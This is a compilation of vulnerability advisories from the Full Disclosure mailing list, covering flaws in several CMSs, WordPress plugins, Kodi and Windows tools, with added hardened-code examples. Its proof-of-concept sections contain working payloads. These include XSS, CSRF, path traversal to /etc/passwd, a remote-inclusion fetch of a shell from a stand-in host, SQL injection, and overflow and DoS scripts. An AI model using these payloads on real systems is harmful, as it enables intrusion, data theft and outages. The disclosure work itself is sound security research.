[FD] Composr CMS 10.0.30 - (Authenticated) Cross-Site Scripting

2020-05-22 Thread Manuel Garcia Cardenas
=
MGC ALERT 2020-001
- Original release date: February 06, 2020
- Last revised:  May 21, 2020
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,8/10 (CVSS Base Score)
- CVE-ID: CVE-2020-8789
=

I. VULNERABILITY
-
Composr CMS 10.0.30 - (Authenticated) Cross-Site Scripting

II. BACKGROUND
-
Composr CMS (or Composr) is a web application for creating websites. It is
a combination of a Web content management system and Online community
(Social Networking) software. Composr is licensed as free software and
primarily written in the PHP programming language.

III. DESCRIPTION
-
A Persistent XSS vulnerability has been detected in Composr CMS that allows
arbitrary HTML/script code to be executed in the context of the victim
user's browser.

IV. PROOF OF CONCEPT
-
Go to: Security -> Usergroups -> Edit Usergroup

Select a Usergroup (for example Guest) and edit the Name (parameter "name"),
for example with: Guests">alert(1)

The variable "name" is not sanitized; later, if a user visits the
"Zone editor" area, the XSS is executed and in the response you can see:

alert(1)" />

V. BUSINESS IMPACT
-
An attacker can execute arbitrary HTML or JavaScript code in a targeted
user's browser; this can be leveraged to steal sensitive information such as
user credentials, personal data, etc.

VI. SYSTEMS AFFECTED
-
Composr CMS <= 10.0.30

VII. SOLUTION
-
Disable until a fix is available.

VIII. REFERENCES
-
https://compo.sr/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
February 06, 2020 1: Initial release
May 21, 2020 2: Last revision

XI. DISCLOSURE TIMELINE
-
February 06, 2020 1: Vulnerability acquired by Manuel Garcia Cardenas
February 06, 2020 2: Sent to vendor
April 06, 2020 3: New request; vendor doesn't answer.
May 21, 2020 4: Sent to lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery

2019-09-13 Thread Manuel Garcia Cardenas
=
MGC ALERT 2019-003
- Original release date: June 13, 2019
- Last revised:  September 13, 2019
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,3/10 (CVSS Base Score)
- CVE-ID: CVE-2019-12922
=

I. VULNERABILITY
-
phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery

II. BACKGROUND
-
phpMyAdmin is a free software tool written in PHP, intended to handle the
administration of MySQL over the Web. phpMyAdmin supports a wide range of
operations on MySQL and MariaDB.

III. DESCRIPTION
-
A Cross-Site Request Forgery vulnerability has been detected in phpMyAdmin
that allows an attacker to delete any server in the Setup page on behalf of
a phpMyAdmin user.

IV. PROOF OF CONCEPT
-
Exploit CSRF - Deleting main server

Deleting Server 1
http://server/phpmyadmin/setup/index.php?page=servers=remove=1;
style="display:none;" />

V. BUSINESS IMPACT
-
The attacker can easily create a fake hyperlink containing the request to be
executed on behalf of the user, making a CSRF attack possible due to the
wrong use of the HTTP method.

VI. SYSTEMS AFFECTED
-
phpMyAdmin <= 4.9.0.1

VII. SOLUTION
-
Implement in each call the validation of the token variable, as already
done in other phpMyAdmin requests.
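The token check the Solution section asks for, as an added example that is not phpMyAdmin's own code: a per-session random token compared in constant time, plus a rejection of any non-POST request for the removal action so a bare hyperlink or hidden image cannot trigger it. Function names, the `token` field and the `id` parameter are assumptions.

```php
<?php
// Added example (not phpMyAdmin's code): anti-CSRF token validation for a
// state-changing "remove server" action. Names are assumptions.

declare(strict_types=1);

const CSRF_SESSION_KEY = 'csrf_token';

// Issue one random token per session; every form embeds it as a hidden field.
function csrf_token(array &$session): string
{
    if (empty($session[CSRF_SESSION_KEY])) {
        $session[CSRF_SESSION_KEY] = bin2hex(random_bytes(32));
    }
    return $session[CSRF_SESSION_KEY];
}

// A state-changing request is accepted only if (a) it is a POST, so a plain
// hyperlink or <img src=...> cannot fire it, and (b) it carries the session
// token, compared in constant time with hash_equals().
function csrf_request_is_valid(string $method, array $session, array $post): bool
{
    if ($method !== 'POST') {
        return false;
    }
    $expected = $session[CSRF_SESSION_KEY] ?? '';
    $given    = $post['token'] ?? '';
    if (!is_string($given) || $expected === '') {
        return false;
    }
    return hash_equals($expected, $given);
}

function remove_server(int $id, array &$servers): bool
{
    if (!isset($servers[$id])) {
        return false;
    }
    unset($servers[$id]);
    return true;
}

// Constructed demonstration: the victim's session and two incoming requests.
$session = [];
$servers = [1 => 'main', 2 => 'replica'];
$token   = csrf_token($session);

// 1. The forged request from the advisory: a GET with no token -> rejected.
if (csrf_request_is_valid('GET', $session, [])) {
    remove_server(1, $servers);
}
printf("after forged request, servers: %s\n", implode(',', array_keys($servers)));

// 2. A legitimate form submission: POST carrying the session token -> accepted.
$post = ['token' => $token, 'id' => '1'];
if (csrf_request_is_valid('POST', $session, $post)) {
    remove_server((int) $post['id'], $servers);
}
printf("after legitimate request, servers: %s\n", implode(',', array_keys($servers)));
```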

VIII. REFERENCES
-
https://www.phpmyadmin.net/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
June 13, 2019 1: Initial release
September 13, 2019 2: Last revision

XI. DISCLOSURE TIMELINE
-
June 13, 2019 1: Vulnerability acquired by Manuel Garcia Cardenas
June 13, 2019 2: Sent to vendor
July 16, 2019 3: New request to vendor without fix date
September 13, 2019 4: Sent to lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
---------
Manuel Garcia Cardenas
Pentester



[FD] CMS Made Simple 2.2.10 - (Authenticated) Persistent Cross-Site Scripting

2019-05-24 Thread Manuel Garcia Cardenas
=
MGC ALERT 2019-002
- Original release date: April 10, 2019
- Last revised:  May 22, 2019
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,8/10 (CVSS Base Score)
- CVE-ID: CVE-2019-11226
=

I. VULNERABILITY
-
CMS Made Simple 2.2.10 - (Authenticated) Persistent Cross-Site Scripting

II. BACKGROUND
-
CMS Made Simple (CMSMS) is a free, open source (GPL) content management
system (CMS) to provide developers, programmers and site owners a web-based
development and administration area.

III. DESCRIPTION
-
A Persistent XSS vulnerability has been detected in CMS Made Simple that
allows arbitrary HTML/script code to be executed in the context of the
victim user's browser.

IV. PROOF OF CONCEPT
-
Go to: Content -> Content Manager -> News -> Add Article

And post in the m1_title parameter, for example:
test">alert(1)

The variable "m1_title" is not sanitized; later, if a user visits the
content in the public area, the XSS is executed and in the response you can
see:

alert(1)

V. BUSINESS IMPACT
-
An attacker can execute arbitrary HTML or JavaScript code in a targeted
user's browser; this can be leveraged to steal sensitive information such as
user credentials, personal data, etc.

VI. SYSTEMS AFFECTED
-
CMS Made Simple <= 2.2.10

VII. SOLUTION
-
Disable until a fix is available; the vendor doesn't accept XSS issues
inside the admin panel.

VIII. REFERENCES
-
https://www.cmsmadesimple.org/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
April 10, 2019 1: Initial release
May 22, 2019 2: Last revision

XI. DISCLOSURE TIMELINE
-
April 10, 2019 1: Vulnerability acquired by Manuel Garcia Cardenas
April 10, 2019 2: Sent to vendor
April 22, 2019 3: New request; vendor doesn't accept XSS issues inside the
admin panel.
May 22, 2019 4: Sent to lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester



[FD] WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion

2019-03-16 Thread Manuel Garcia Cardenas
=
MGC ALERT 2019-001
- Original release date: February 06, 2019
- Last revised:  March 13, 2019
- Discovered by: Manuel García Cárdenas
- Severity: 7/10 (CVSS Base Score)
- CVE-ID: CVE-2019-9618
=

I. VULNERABILITY
-
WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion

II. BACKGROUND
-
Hassle-free and user-friendly way to add a Media player directly to your
website.

III. DESCRIPTION
-
This bug was found in the file:

/gracemedia-media-player/templates/files/ajax_controller.php

Vulnerable code:

require_once($_GET['cfg']);

The parameter "cfg" is not sanitized, allowing local files to be included.

To exploit the vulnerability it is only necessary to use version 1.0 of the
HTTP protocol to interact with the application.

IV. PROOF OF CONCEPT
-
The following URL has been confirmed to be vulnerable to local file
inclusion.

Local File Inclusion POC:

GET /wordpress/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds=../../../../../../../../../../etc/passwd

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
GraceMedia Media Player <= 1.0

VII. SOLUTION
-
Disable the plugin until a fix is available; the vendor has not fixed it
after 2 requests.

VIII. REFERENCES
-
https://es.wordpress.org/plugins/gracemedia-media-player/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
February 06, 2019 1: Initial release
March 13, 2019 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-
February 06, 2019 1: Vulnerability acquired by Manuel Garcia Cardenas
February 06, 2019 2: Email to vendor without response
February 21, 2019 3: Second email to vendor without response
March 13, 2019 4: Sent to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
---------
Manuel Garcia Cardenas
Pentester


[FD] WordPress Plugin Localize My Post 1.0 - Local File Inclusion

2018-09-20 Thread Manuel Garcia Cardenas
=
MGC ALERT 2018-006
- Original release date: August 31, 2018
- Last revised:  September 19, 2018
- Discovered by: Manuel García Cárdenas
- Severity: 7/10 (CVSS Base Score)
- CVE-ID: CVE-2018-16299
=

I. VULNERABILITY
-
WordPress Plugin Localize My Post 1.0 - Local File Inclusion

II. BACKGROUND
-
This plugin makes it super easy to add and manage locations in your posts
and pages.

III. DESCRIPTION
-
This bug was found in the file:

/localize-my-post/ajax/include.php

include($_REQUEST['file']);

The parameter "file" is not sanitized, allowing local files to be included.

To exploit the vulnerability it is only necessary to use version 1.0 of the
HTTP protocol to interact with the application.

IV. PROOF OF CONCEPT
-
The following URL has been confirmed to be vulnerable to local file
inclusion.

Local File Inclusion POC:

GET /wordpress/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
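Both this advisory and the GraceMedia one above reduce to the same defect: a request value handed straight to `include`/`require_once`. The hardened form below is an added example, not code from either plugin: the request value is only a lookup key into an allowlist of template names, and the resolved path is additionally checked to lie under a fixed base directory. The directory name and the template names are assumptions.

```php
<?php
// Added example (not code from either plugin): resolve a user-supplied name
// against a fixed template directory before include(). Names are assumptions.

declare(strict_types=1);

// Only these bare names may ever be included; the request never supplies a path.
const ALLOWED_TEMPLATES = ['player' => 'player.php', 'playlist' => 'playlist.php'];

/**
 * Map an untrusted request value to a real file inside $baseDir, or null.
 * Two independent checks: the value must be an allowlisted key, and the
 * resolved path must still lie under the base directory (realpath() collapses
 * any "../" sequences, so a traversal attempt fails the prefix test).
 */
function safe_template_path(string $baseDir, string $requested): ?string
{
    if (!array_key_exists($requested, ALLOWED_TEMPLATES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . ALLOWED_TEMPLATES[$requested]);
    if ($base === false || $path === false) {
        return null;                         // directory or file does not exist
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                         // resolved outside the base directory
    }
    return $path;
}

// Constructed demonstration: a temporary base directory with one real template.
$baseDir = sys_get_temp_dir() . '/lfi-demo-' . bin2hex(random_bytes(4));
mkdir($baseDir);
file_put_contents($baseDir . '/player.php', "<?php echo 'player template';\n");

$inputs = [
    'player',                                         // legitimate
    '../../../../../../../../../../etc/passwd',       // traversal from the advisories
    'player.php',                                     // a file name, not an allowlisted key
];
foreach ($inputs as $in) {
    $resolved = safe_template_path($baseDir, $in);
    if ($resolved === null) {
        echo "rejected: $in\n";
        continue;
    }
    require_once $resolved;                          // only ever a vetted path
    echo "\nincluded: $resolved\n";
}

unlink($baseDir . '/player.php');
rmdir($baseDir);
```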

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
Localize My Post <= 1.0

VII. SOLUTION
-
Disable plugin until a fix is available.
https://github.com/julianburr/wp-plugin-localizemypost/issues/1

VIII. REFERENCES
-
https://es.wordpress.org/plugins/localize-my-post/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
August 31, 2018 1: Initial release
September 19, 2018 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-
August 31, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
August 31, 2018 2: Email to vendor without response
September 10, 2018 3: Second email to vendor without response
September 19, 2018 4: Sent to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
---------
Manuel Garcia Cardenas
Pentester


[FD] WordPress Plugin Wechat Broadcast 1.2.0 - Local/Remote File Inclusion

2018-09-20 Thread Manuel Garcia Cardenas
=
MGC ALERT 2018-005
- Original release date: August 31, 2018
- Last revised:  September 19, 2018
- Discovered by: Manuel García Cárdenas
- Severity: 9/10 (CVSS Base Score)
- CVE-ID: CVE-2018-16283
=

I. VULNERABILITY
-
WordPress Plugin Wechat Broadcast 1.2.0 - Local/Remote File Inclusion

II. BACKGROUND
-
Wechat Broadcast allows pushing to WeChat public account subscribers.

III. DESCRIPTION
-
This bug was found in the file:

/wechat-broadcast/wechat/Image.php

echo file_get_contents(isset($_GET["url"]) ? $_GET["url"] : '');

The parameter "url" is not sanitized, allowing local or remote files to be
included.

To exploit the vulnerability it is only necessary to use version 1.0 of the
HTTP protocol to interact with the application.

IV. PROOF OF CONCEPT
-
The following URLs have been confirmed to be vulnerable to local and remote
file inclusion.

Local File Inclusion POC:

GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd

Remote File Inclusion POC:

GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=http://malicious.url/shell.txt
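Unlike the `include` cases above, `file_get_contents()` on a request value reads local paths, `php://` wrappers and arbitrary remote hosts alike. The added example below (not the plugin's code) validates the URL before fetching: absolute `http(s)` only, host on an allowlist, no embedded credentials, and a bounded timeout with redirects disabled. The allowed host name is an assumption.

```php
<?php
// Added example (not the plugin's code): validate a user-supplied URL before
// fetching it, so an Image.php-style proxy can neither read local files nor
// fetch arbitrary remote hosts. The allowed host list is an assumption.

declare(strict_types=1);

const ALLOWED_IMAGE_HOSTS = ['images.example.com'];   // assumed CDN host(s)

/**
 * Return the URL if it is an absolute http(s) URL on an allowlisted host, else null.
 * Relative values such as "../../etc/passwd" have no scheme and are rejected,
 * as are file://, php://, data:// and any host outside the allowlist.
 */
function validate_image_url(string $url): ?string
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    if (!in_array(strtolower($parts['host']), ALLOWED_IMAGE_HOSTS, true)) {
        return null;
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return null;                    // reject "http://user@host/" style confusion
    }
    return $url;
}

/** Fetch a vetted URL with a timeout and no redirects, or return null. */
function fetch_image(string $url): ?string
{
    $safe = validate_image_url($url);
    if ($safe === null) {
        return null;
    }
    $ctx  = stream_context_create(['http' => ['timeout' => 5, 'follow_location' => 0]]);
    $body = @file_get_contents($safe, false, $ctx);
    return $body === false ? null : $body;
}

// Constructed inputs: the two PoC values from the advisory plus two more cases.
$candidates = [
    '../../../../../../../../../../etc/passwd',
    'http://malicious.url/shell.txt',
    'php://filter/resource=/etc/passwd',
    'https://images.example.com/cover.jpg',
];
foreach ($candidates as $candidate) {
    printf("%-45s -> %s\n", $candidate,
        validate_image_url($candidate) === null ? 'rejected' : 'allowed');
}
```

Only the last candidate passes validation; `fetch_image()` is what the proxy endpoint would call in place of the raw `file_get_contents()`.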

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
Wechat Broadcast <= 1.2.0

VII. SOLUTION
-
Disable plugin until a fix is available.
https://github.com/springjk/wordpress-wechat-broadcast/issues/14

VIII. REFERENCES
-
https://es.wordpress.org/plugins/wechat-broadcast/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
August 31, 2018 1: Initial release
September 19, 2018 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-
August 31, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
August 31, 2018 2: Email to vendor without response
September 10, 2018 3: Second email to vendor without response
September 19, 2018 4: Sent to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester


[FD] WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection

2018-06-14 Thread Manuel Garcia Cardenas
=
MGC ALERT 2018-004
- Original release date: May 10, 2018
- Last revised:  June 11, 2018
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
- CVE-ID: CVE-2018-10969
=

I. VULNERABILITY
-
WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection

II. BACKGROUND
-
Pie-Register is a quick and easy way to brand your Registration Pages on
WordPress sites.

III. DESCRIPTION
-
This bug was found using the portal, in the file:

/pie-register/classes/invitation_code_pagination.php:if ( isset( $_GET['order'] ) && $_GET['order'] )
/pie-register/classes/invitation_code_pagination.php:$order = $_GET['order'];

And when the query is executed, the parameter "order" is not sanitized:

/pie-register/classes/invitation_code_pagination.php:$this->order = esc_sql( $order );

To exploit the vulnerability it is only necessary to use version 1.0 of the
HTTP protocol to interact with the application.

It is possible to inject SQL code.

IV. PROOF OF CONCEPT
-
The following URLs have been confirmed to suffer from Time Based SQL
Injection.

Time Based SQL Injection POC:

GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes=name=desc
(original)

GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes=name=desc%2c(select*from(select(sleep(2)))a) HTTP/1.1
(2 seconds of response)

GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes=name=desc%2c(select*from(select(sleep(30)))a) HTTP/1.1
(30 seconds of response)

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
Pie Register <= 3.0.9

VII. SOLUTION
-
Disable website until a fix is available.

VIII. REFERENCES
-
https://es.wordpress.org/plugins/pie-register/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
May 10, 2018 1: Initial release
June 11, 2018 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-
May 10, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
May 10, 2018 2: Sent to vendor without response
June 05, 2018 3: Second email to vendor without response
June 11, 2018 4: Sent to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-----
Manuel Garcia Cardenas
Pentester


[FD] Kodi <= 17.6 - Persistent Cross-Site Scripting

2018-04-17 Thread Manuel Garcia Cardenas
=
MGC ALERT 2018-003
- Original release date: March 19, 2018
- Last revised:  April 16, 2018
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,8/10 (CVSS Base Score)
- CVE-ID: CVE-2018-8831
=

I. VULNERABILITY
-
Kodi <= 17.6 - Persistent Cross-Site Scripting

II. BACKGROUND
-
Kodi (formerly XBMC) is a free and open-source media player software
application developed by the XBMC Foundation, a non-profit technology
consortium. Kodi is available for multiple operating systems and hardware
platforms, with a software 10-foot user interface for use with televisions
and remote controls.

III. DESCRIPTION
-
A Persistent XSS vulnerability has been detected in the web interface of
Kodi that allows arbitrary HTML/script code to be executed in the context
of the victim user's browser.

IV. PROOF OF CONCEPT
-
Go to: Playlist -> Create

Create a playlist injecting javascript code:



The XSS is executed in the victim's browser.

V. BUSINESS IMPACT
-
An attacker can execute arbitrary HTML or script code in a targeted user's
browser; this can be leveraged to steal sensitive information such as user
credentials, personal data, etc.

VI. SYSTEMS AFFECTED
-
Kodi <= 17.6

VII. SOLUTION
-
The vendor has included the fix:
https://trac.kodi.tv/ticket/17814

VIII. REFERENCES
-
https://kodi.tv/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
March 19, 2018 1: Initial release
April 16, 2018 2: Last revision

XI. DISCLOSURE TIMELINE
-
March 19, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
March 19, 2018 2: Sent to vendor
March 30, 2018 3: Vendor fix
April 16, 2018 4: Sent to lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
---------
Manuel Garcia Cardenas
Pentester



[FD] SQL Injection in Textpattern <= 4.6.2

2018-03-13 Thread Manuel Garcia Cardenas
=
MGC ALERT 2018-002
- Original release date: February 12, 2018
- Last revised:  March 12, 2018
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
- CVE-ID: CVE-2018-7474
=

I. VULNERABILITY
-
SQL Injection in Textpattern <= 4.6.2

II. BACKGROUND
-
Textpattern is a free and open-source content management system (CMS) based
on PHP and MySQL, originally developed by Dean Allen and now developed by
Team Textpattern.

III. DESCRIPTION
-
This bug was found using the portal with authentication as administrator.

To exploit the vulnerability it is only necessary to use version 1.0 of the
HTTP protocol to interact with the application.

It is possible to inject SQL code in the variable "qty" on the page
"index.php".

IV. PROOF OF CONCEPT
-
The following URLs and parameters have been confirmed to suffer from SQL
injection.

/textpattern/textpattern/index.php?event=link=link_change_pageby=50&_txp_token=baa07ba857d3618ef810b725b9d4d9d8

Note: the variable "_txp_token" does not work as an anti-CSRF token.

POC:

/textpattern/textpattern/index.php?event=link=link_change_pageby=50%20into%20outfile%20'%5cfakesite.com%5c'%3b%20--%20&_txp_token=baa07ba857d3618ef810b725b9d4d9d8

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
Textpattern <= 4.6.2

VII. SOLUTION
-
Disable website until a fix is available.

VIII. REFERENCES
-
https://textpattern.com/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
February 12, 2018 1: Initial release
March 12, 2018 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-
February 12, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
February 12, 2018 2: Sent to vendor without response
February 26, 2018 3: Second email to vendor without response
March 12, 2018 4: Sent to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester


[FD] PyroBatchFTP <= 3.18 - Local Buffer Overflow (SEH)

2018-01-13 Thread Manuel Garcia Cardenas
=
MGC ALERT 2018-001
- Original release date: December 22, 2017
- Last revised:  January 12, 2018
- Discovered by: Manuel García Cárdenas
- Severity: 7,5/10 (CVSS Base Score)
=

I. VULNERABILITY
-
PyroBatchFTP <= 3.18 - Local Buffer Overflow (SEH)

II. BACKGROUND
-
PyroBatchFTP is Windows software that lets you exchange files with FTP,
FTPS or SFTP servers in an automatic and unattended way, using a simple yet
powerful batch/script language.

III. DESCRIPTION
-
The Enterprise version of PyroBatchFTP is affected by a Local Buffer
Overflow vulnerability.

The application does not check bounds when reading the file containing the
script to execute, resulting in a classic Buffer Overflow that overwrites
the SEH handler.

To exploit the vulnerability it is only necessary to create a local script
file for the application to read.

IV. PROOF OF CONCEPT
-
#!/usr/bin/perl
use strict;
use warnings;

# Write a script file whose single line is long enough (2052 bytes) to
# overrun the buffer, followed by the values that land on the SEH record.
my $file = "crash.cmd";
my $junk = "A" x 2052;
my $nseh = "";    # next SEH record pointer
my $seh  = "";    # SEH handler address
open(my $FILE, '>', $file) or die "Cannot open $file: $!";
print $FILE $junk . $nseh . $seh;
close($FILE);
print "File created successfully\n";

V. BUSINESS IMPACT
-
Availability compromise can result from these attacks.

VI. SYSTEMS AFFECTED
-
PyroBatchFTP <= 3.18

VII. SOLUTION
-
The vendor released version 3.19:
http://www.emtec.com/downloads/pyrobatchftp/pyrobatchftp319_changes.txt

VIII. REFERENCES
-
https://www.emtec.com/pyrobatchftp/index.html

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
December 22, 2017 1: Initial release
January 12, 2018 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
---------
December 22, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
December 22, 2017 2: Sent to vendor
January 12, 2018 3: Vendor fixed the vulnerability and released a new version
January 12, 2018 4: Sent to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester


[FD] SyncBreeze <= 10.2.12 - Denial of Service

2017-12-15 Thread Manuel Garcia Cardenas
=
MGC ALERT 2017-007
- Original release date: November 30, 2017
- Last revised:  December 14, 2017
- Discovered by: Manuel García Cárdenas
- Severity: 7,5/10 (CVSS Base Score)
- CVE-ID: CVE-2017-17088
=

I. VULNERABILITY
-
SyncBreeze <= 10.2.12 - Denial of Service

II. BACKGROUND
-
SyncBreeze is a fast, powerful and reliable file synchronization solution
for local disks, network shares, NAS storage devices and enterprise storage
systems.

III. DESCRIPTION
-
The Enterprise version of SyncBreeze is affected by a Remote Denial of
Service vulnerability.

The web server does not check bounds when reading the Host header of a
request on an incoming connection, resulting in a classic Buffer Overflow
that causes a Denial of Service.

To exploit the vulnerability it is only necessary to use version 1.1 of the
HTTP protocol to interact with the application.

IV. PROOF OF CONCEPT
-
#!/usr/bin/python
import sys, socket

# Target host is taken from the command line; the request goes to port 80.
host = sys.argv[1]

# One HTTP/1.1 request whose Host header is 2000 bytes long.
buffer = "GET / HTTP/1.1\r\n"
buffer += "Host: " + "A" * 2000 + "\r\n\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 80))
s.send(buffer.encode())   # encode so the script also runs under Python 3
s.close()

V. BUSINESS IMPACT
-
Availability compromise can result from these attacks.

VI. SYSTEMS AFFECTED
-
SyncBreeze <= 10.2.12

VII. SOLUTION
-
The vendor released version 10.3:
http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.3.14.exe

VIII. REFERENCES
-
http://www.syncbreeze.com/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
November 30, 2017 1: Initial release
December 14, 2017 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-
November 30, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
November 30, 2017 2: Sent to vendor
December 6, 2017 3: Vendor fixed the vulnerability and released a new version
December 14, 2017 4: Sent to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester


[FD] Backdrop CMS <= 1.7.1 - Persistent Cross-Site Scripting

2017-08-23 Thread Manuel Garcia Cardenas
=
MGC ALERT 2017-005
- Original release date: July 11, 2017
- Last revised:  August 18, 2017
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,8/10 (CVSS Base Score)
=

I. VULNERABILITY
-
Backdrop CMS <= 1.7.1 - Persistent Cross-Site Scripting

II. BACKGROUND
-
Backdrop CMS is a simple, lightweight, and easy to use Content Management
System used to build attractive, professional websites.

III. DESCRIPTION
-
A Persistent XSS vulnerability has been detected in Backdrop CMS that
allows arbitrary HTML/script code to be executed in the context of the
victim user's browser.

IV. PROOF OF CONCEPT
-
Go to: Structure -> Content types -> Add content type

And post:

POST /backdrop/admin/structure/types/add HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101
Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 605
Referer: http://127.0.0.1/backdrop/admin/structure/types/add
Cookie: Backdrop.tableDrag.showWeight=0;
PHPSESSID=libl3ge64tv5vajangccjhifu2; phpwcmsBELang=en;
phpwcmsBEItemsPerPage=50; _ctr=MTI3XzBfMF8xLlpa;
